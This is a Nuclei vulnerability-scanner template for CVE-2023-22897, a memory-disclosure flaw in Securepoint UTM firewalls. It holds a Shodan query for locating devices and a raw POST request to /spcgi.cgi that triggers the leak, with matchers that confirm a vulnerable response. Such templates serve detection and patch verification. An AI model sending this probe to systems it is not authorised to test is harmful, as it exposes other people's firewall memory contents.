nuclei-templates/http/cves/2023/CVE-2023-22897.yaml

45 lines
1.3 KiB
YAML

id: CVE-2023-22897
info:
name: Securepoint UTM - Leaking Remote Memory Contents
author: DhiyaneshDK
severity: medium
description: |
An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows information disclosure of memory contents to be achieved by an authenticated user. Essentially, uninitialized data can be retrieved via an approach in which a sessionid is obtained but not used.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-22897
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22897.txt
- https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/
metadata:
max-request: 1
verified: true
shodan-query: title:"Securepoint UTM"
tags: cve,cve2023,securepoint,utm,exposure,memory
http:
- raw:
- |
POST /spcgi.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"sessionid":'
- '"mode":'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200